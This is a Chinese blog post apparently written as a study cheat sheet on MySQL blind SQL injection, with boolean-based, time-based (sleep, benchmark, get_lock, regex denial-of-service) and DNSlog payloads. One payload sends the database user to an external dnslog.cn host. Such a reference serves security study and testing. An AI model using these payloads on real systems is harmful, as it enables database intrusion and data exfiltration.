MySQL盲注

最新推荐文章于 2023-11-24 17:44:18 发布
最新推荐文章于 2023-11-24 17:44:18 发布
阅读量340 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39654116/article/details/112239958
版权

这里写目录标题

MySQL注入总结

布尔盲注

盲注一般先看长度
id=4 and length(user())=14

布尔盲注的方法
substr,substring,mid,leftright截取单个字符
id=4 and substr((select user()),1,1)=0x72
id=4 and left((select user()),1)=0x72

用ascii(),ord(),hex()编码单个字符
id=4 and ascii(substring((select user()) from 1 for 1))=114
id=4 and ord(mid((select user()),1,1))=114
id=4 and hex(right((select user()),1))=74if,ifnull,case when自由输出字符
id=4 and if(1=1,1,0)
id=4 and ifnull(1=1,0)
id=4 and (case when 1=1 then 1 else 0 end)

如果查询是空内容,同时传入两个值使其报错来构成布尔盲注
select null and 1=(case when 1=1 then (select 666) else (select 666 union select 667)end)

时间盲注

sleep函数

if(布尔盲注语句,sleep(5),1)

benchmark函数

简介
BENCHMARK(count,expr)函数

benchmark函数会重复计算expr表达式count次,所以我们可以尽可能多的增加计算的次数来增加时间延迟。

语句

 and if((布尔盲注语句),BENCHMARK(10000000,md5('a')),1);

笛卡尔积函数

简介
所谓叠加全排列就是对多个表做笛卡尔积连接,使之查询时间呈指数增长,也就是说,攻击者将简单的表查询不断地叠加,不断增加系统执行sql语句的负荷,直到产生攻击者想要的时间延迟。为了防止表明重复可能导致不必要的错误,所以一般都会用表别名来区别

 and if((布尔盲注语句),(笛卡尔积函数语句),1);

语句

mysql> select count(*) from information_schema.columns a,information_schema.columns b;
+----------+
| count(*) |
+----------+
|   774400 |
+----------+
1 row in set (0.20 sec)

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
+-----------+
| count(*)  |
+-----------+
| 113101560 |
+-----------+
1 row in set (2.07 sec)

get_lock盲注

简介
对关键字进行了get_lock,那么再开另一个session再次对关键进行get_lock,就会延时我们指定的时间。此盲注手法有一些限制,就是必须要同时开两个SESSION进行注入。

GET_LOCK(str,timeout)

例子

SESSION A

mysql> select get_lock('rocky',5);
+---------------------+
| get_lock('rocky',5) |
+---------------------+
|                   1 |
+---------------------+
1 row in set (0.00 sec)

SESSION B

mysql> select get_lock('rocky',5);
+---------------------+
| get_lock('rocky',5) |
+---------------------+
|                   0 |
+---------------------+
1 row in set (5.00 sec)

语句
and if((布尔盲注语句),GET_LOCK(str,timeout),1);

正则DOS RLIKE注入

简介
延时原理,利用SQL多次计算正则消耗计算资源产生延时效果,其实原理是和我们的benchmark注入差不多的

语句

mysql> select * from flag where flag='1' and if(mid(user(),1,1)='s',concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',1);
+------+
| flag |
+------+
| 1    |
+------+
1 row in set (0.00 sec)

mysql> select * from flag where flag='1' and if(mid(user(),1,1)='r',concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+cd',1);
Empty set (3.83 sec)

dnslog盲注

利用条件
1.必须windows系统(跟windows中unc路径原理有关,linux没有相关标准)

2.必须root权限

3.有文件读取权限及 secure-file-priv无值, show variables like ‘%secure%’

4.利用一个dnslog平台查看回显结果

注意遇到魔术引号拦截的场景。

语句

注:xxxx.dnslog.cn\\xxxx , \\xxxx可以是任意字符串,实际上不存在也行
 load_file(concat('\\\\'(select user()),'.xxxx.dnslog.cn\\a.txt'))

后续待补充

Rocky_x
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql总结
z7sz的博客
06-21 1123
本文的内容主要是对mysql的总结
SQL入学习之(八)
公众号:乌云安全
02-03 1151
0x00 我这里只归纳为 时间 布尔 其实在如今的实际环境中一般的情况毕竟多,时间太费时间 同时对网络要求比较高,二分,dnslog,等等可以加快入的进程。 0x01 中值得意的问题 中使用 and 你得确定你查询的值得存在 。 在返回多组数据的情况下,你的延时不再是 单纯的 sleep(5) 他将根据你返回的数据条数来反复执行 在如同搜索型时尽量搜索存在且数目较少的关键词 尽量不要使用 or 至于以上为什么会出现这种原因 推荐大家看看
sql时间另外两种方式(benchmark,heavy query)
weixin_34378045的博客
05-19 368
在某些情况下进行时间的时候,如果sleep()函数无法使用,我们可以使用以下两种方式来达到延时的效果。 1.benchmark() benchmark是Mysql的一个内置函数,其作用是来测试一些函数的执行速度。benchmark()中带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式 mysql> select BENCHMARK(10000,md5('a')...
mysql入之语句汇总
sirius的博客
08-28 3675
目录 mysql入之 常用语句汇总 基于bool 查询当前数据库 基于时间的 常用函数: regexp正则入 like匹配入 特殊的之报错mysql入之 什么是? 基于布尔型SQL即在SQL入过程中,应用程序仅仅返回True(页面)和False(页面)。 就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
时间
aaartemis的博客
01-17 601
分为两类: 1.布尔 布尔很明显Ture跟Fales,也就是说它只会根据. 你的入信息返回Ture跟Fales,也就没有了之前的报错信息。 2.时间 界面返回值只有一种,true.无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断入的语句是否正确。 简书:Hell0_C 时间 逐字入 select * fro...
SQL
ChuMeng1999的博客
09-26 126
先介绍一下,information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式(元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等)。可以和上一个入的代码对比会发现多了一条语句,之所以比普通入困难,就是因为这句代码把返回的错误信息屏蔽掉了,攻击者就无法判断,因此增加了入的难度,但这不是根本解决的方法,因为它并没有阻止入的发生,只是把入的结果屏蔽而已。现在可以查询表名列名和数据了,利用的是Mysql的系统函数,很容易查询出想要的数据。
Web应用安全:Mysql.pptx
06-19
Web应用安全领域中,MySQL是一种常见的安全漏洞,它发生在SQL入攻击中,但攻击者无法直接看到数据库的响应结果。在这种情况下,攻击者必须通过观察页面加载时间、页面内容的变化或者其他间接方式来判断SQL查询...
Web应用安全:Mysql文本.docx
06-17
MySQL】是Web应用安全领域中一种重要的SQL入技术。当攻击者无法直接从网页上获取数据库的反馈信息时,他们会通过一系列的探测和判断来获取敏感数据。主要分为三种类型:基于布尔的SQL、基于时间的...
Web应用安全:Mysql实验).docx
06-17
Web应用安全领域中,MySQL是一种常见的攻击手段,它主要针对存在SQL入漏洞的Web应用程序。本实验的目的是让参与者了解并实践MySQL,从而掌握如何利用这种技术获取数据库中的敏感信息,如账号和密码。 在...
mysql-blind(高级+基于布尔).docx
01-23
MySQL 高级:布尔型详解】 MySQL,特别是布尔型,是一种在目标页面无明显回显时检测SQL入漏洞的技术。这种技术源于某些网站的错误处理机制使得常规的UNION查询无法直接揭示数据字段。...
mysql练习入语句
01-21
这里,我们将学习 MySQL 的一些基本知识点,包括MySQL数据库函数、布尔语句、时间语句、宽字节入、黑名单和白名单等。 一、MySQL数据库函数 MySQL提供了许多有用的函数,可以帮助我们更好地管理和操作...
Mysql总结
b1ackc4t的博客
01-24 2899
Mysql 当我们无法从显示的页面上直接获取SQL语句的执行结果时,需要进行 手工的基本步骤 判断是否存在入 字符型还是数值型 猜解当前数据库名 猜解数据库的表名 猜解表中的字段名 猜解数据 下面,我们探讨一下常见的三种 基于报错的 利用条件 系统未关闭数据库报错信息,对于一些sql错误直接回显在了错误上 未对报错函数进行过滤 group by key报错 原理 当在一个聚合函数,比如CONUNT函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来, co
mysql
m0_65096687的博客
04-09 102
仍然要判断字符类型入,可以根据页面的反应。1 and 1=2 如果页面显示正常,那么就是字符型入,因为如果是数字,不成立,会有异常。所以第一步仍是判断入类型就是存在入但是页面上没有任何回显。分为布尔和时间
SQL入-(布尔与时间
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是 就是在sql入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql入。 二、的分类 基于布尔类型的 基于时间类型的 三、利用
SQL入2——(重学)
qq_52263650的博客
11-07 3781
SQL入2——布尔型(重学)
SQL入-
m0_72125469的博客
11-24 254
SQL入系列-
dvwa之SQL
ANDTM的博客
05-30 978
SQL入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL和SQL入的区别就是它不会有完整的回显,这里分为两种,一种是布尔,另一种是时间
b050闲置图书分享-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
最新发布
07-23
本次开发的闲置图书分享平台实现了收货地址管理、字典管理、公告管理、留言板管理、图书管理、图书收藏管理、图书评价管理、图书订单管理、用户管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让闲置图书分享平台更能从理念走到现实,确确实实的让人们提升信息处理效率。 管理图书的数据,此页面主要实现图书的增加、修改、删除、查看的功能。公告信息管理页面提供的功能操作有:新增公告,修改公告,删除公告操作。公告类型管理页面显示所有公告类型,在此页面既可以让管理员添加新的公告信息类型,也能对已有的公告类型信息执行编辑更新,失效的公告类型信息也能让管理员快速删除。
MySQL布尔型高级实战与技巧解析
MySQL是一种高级的Web应用程序安全漏洞,特别是针对那些错误处理机制良好的目标页面。在这种情况下,常规的SQL入利用方法,如通过UNION查询获取数据字段,可能因为页面无明显回显而变得困难。分为几种类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值